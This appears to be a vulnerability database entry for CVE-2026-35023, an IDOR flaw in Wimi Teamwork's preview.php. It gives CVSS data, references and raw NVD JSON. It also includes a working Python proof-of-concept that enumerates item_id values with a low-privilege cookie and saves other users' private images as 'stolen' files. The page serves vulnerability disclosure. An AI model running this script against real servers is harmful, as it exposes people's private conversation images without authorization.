CVE-2026-35023

Description

Wimi Teamwork On-Premises versions prior to 8.2.0 contain an insecure direct object reference vulnerability in the preview.php endpoint where the item_id parameter lacks proper authorization checks. Attackers can enumerate sequential item_id values to access and retrieve image previews from other users' private or group conversations, resulting in unauthorized disclosure of sensitive information.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Wimi Teamwork On-Premises < 8.2.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Example)
target_url = "https://target-domain.com/preview.php"

# Attacker's cookie (Low privilege session)
cookies = {
    "PHPSESSID": "valid_attacker_session_id"
}

# Headers to mimic browser
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
}

print("[*] Starting IDOR enumeration...")

# Loop through sequential item_id values
for item_id in range(1, 5000):
    params = {
        "item_id": item_id
    }
    try:
        response = requests.get(target_url, params=params, cookies=cookies, headers=headers, timeout=5)
        
        # Check if response indicates an image or valid content
        if response.status_code == 200 and "image" in response.headers.get("Content-Type", ""):
            print(f"[+] Found sensitive image for item_id: {item_id}")
            # Save the retrieved file
            with open(f"stolen_preview_{item_id}.jpg", "wb") as f:
                f.write(response.content)
        elif response.status_code == 403 or response.status_code == 404:
            # Expected behavior for non-existent or restricted (if fixed) items
            pass
            
    except requests.RequestException as e:
        print(f"[-] Error connecting to server: {e}")
        break

print("[*] Enumeration completed.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-35023
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-35023
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-35023/
[4] VulDB https://vuldb.com/cve/CVE-2026-35023
[5] https://www.vulncheck.com/advisories/wimi-teamwork-on-premises-idor-via-preview-php
[6] https://www.wimi-teamwork.com/en/product-update

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-35023", "sourceIdentifier": "[email protected]", "published": "2026-04-08T14:16:28.320", "lastModified": "2026-04-09T18:16:59.410", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wimi Teamwork On-Premises versions prior to 8.2.0 contain an insecure direct object reference vulnerability in the preview.php endpoint where the item_id parameter lacks proper authorization checks. Attackers can enumerate sequential item_id values to access and retrieve image previews from other users' private or group conversations, resulting in unauthorized disclosure of sensitive information."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://www.vulncheck.com/advisories/wimi-teamwork-on-premises-idor-via-preview-php", "source": "[email protected]"}, {"url": "https://www.wimi-teamwork.com/en/product-update", "source": "[email protected]"}]}}